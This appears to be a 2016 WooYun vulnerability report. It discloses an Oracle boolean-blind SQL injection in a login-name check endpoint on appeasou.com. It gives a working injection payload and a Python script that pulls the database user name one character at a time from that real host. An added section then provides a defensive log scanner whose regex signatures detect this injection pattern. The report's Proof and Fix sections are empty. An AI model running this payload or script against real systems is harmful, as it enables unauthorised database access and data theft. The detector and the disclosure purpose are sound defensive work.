
SQL injection in a Yisou Technology (宜搜科技) endpoint (script attached)

2016-04-27 23:30

Code area:

```
http://www.appeasou.com/jsp/static/join/user!checkUserName.action

username=-1' OR length(SYS_CONTEXT('USERENV','CURRENT_USER'))=3 or 'Q'='
```

When the injected condition is true, the response displays true (screenshot 4.png).

When it is false, the response is blank (screenshot 5.png).

The current database user name is 3 characters long (screenshot 6.png).

Code area:

```python
#encoding=utf-8
import httplib
import time
import string
import sys
import re
import random
import urllib

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
}

# Candidate characters for the user name: letters and digits.
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0, 10):
    payloads.append(str(i))

print 'start to retrieve Oracle user:'
user = ''
# The length probe above showed the name is 3 characters long.
for i in range(1, 4, 1):
    for payload in payloads:
        conn = httplib.HTTPConnection('www.appeasou.com', timeout=60)
        params = {
            'username': "-1' OR ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s or 'B'='" % (i, ord(payload)),
        }
        conn.request(method='POST',
                     url='/jsp/static/join/user!checkUserName.action',
                     body=urllib.urlencode(params),
                     headers=headers)
        start_time = time.time()
        html_doc = conn.getresponse().read()
        #print html_doc
        conn.close()
        print '.',
        if re.search('true', html_doc):  # the page answers "true" only when the condition holds
            user += payload
            print '\n[in progress]', user
            break

print '\nOracle user is', user
```
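A detection-side counterpart, added here and not part of the original report or of the affected site's code: it scans constructed request-log lines for the three markers this injection leaves in the username parameter (the Oracle SYS_CONTEXT('USERENV') lookup, the per-character ascii(substr(...)) probe and the trailing or 'x'=' tautology) and flags clients that send repeated probes, which is the signature of character-by-character blind extraction. The log line format, client IPs and user names are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlencode

# Signatures for the injection shape in the report: an Oracle session-context lookup,
# a per-character ascii(substr(...)) probe, and a trailing "or 'x'='" tautology.
SIGNATURES = {
    "oracle_userenv": re.compile(r"SYS_CONTEXT\s*\(\s*'USERENV'", re.I),
    "char_probe": re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    "quote_tautology": re.compile(r"\bor\s+'[^']*'\s*=\s*'\s*$", re.I),
}

def classify(raw_value):
    """Return the signature names matched by one (possibly URL-encoded) form value."""
    value = unquote_plus(raw_value)
    return {name for name, rx in SIGNATURES.items() if rx.search(value)}

def scan_log(log_text, min_probes=2):
    """Count suspicious 'username' values per client IP and return the clients that
    sent at least min_probes of them; blind extraction needs many such requests.
    Line format (constructed for this example): '<ip> <method> <path> <form body>'."""
    probes = Counter()
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ip, _method, _path, body = parts
        for field in body.split("&"):
            key, _, val = field.partition("=")
            if key == "username" and classify(val):
                probes[ip] += 1
    return {ip: n for ip, n in probes.items() if n >= min_probes}

# Constructed sample traffic (not captured from the real site): one legitimate check,
# the report's length probe, three character probes, and a name with an apostrophe.
PROBE = "-1' OR ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%d,1))=%d or 'B'='"

def _line(ip, username):
    return f"{ip} POST /jsp/static/join/user!checkUserName.action " + urlencode({"username": username})

SAMPLE_LOG = "\n".join([
    _line("10.0.0.5", "alice"),
    _line("203.0.113.7", "-1' OR length(SYS_CONTEXT('USERENV','CURRENT_USER'))=3 or 'Q'='"),
    _line("203.0.113.7", PROBE % (1, 97)),
    _line("203.0.113.7", PROBE % (1, 98)),
    _line("203.0.113.7", PROBE % (2, 97)),
    _line("10.0.0.9", "o'brien"),  # a legitimate apostrophe must not be flagged
])
```

Running `scan_log(SAMPLE_LOG)` returns `{'203.0.113.7': 4}`; a single match per client is below the default threshold, so an isolated odd value does not raise an alert on its own.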

Proof of vulnerability:

Fix:

Source: www.wooyun.org/bugs/wooyun-2016-0199082
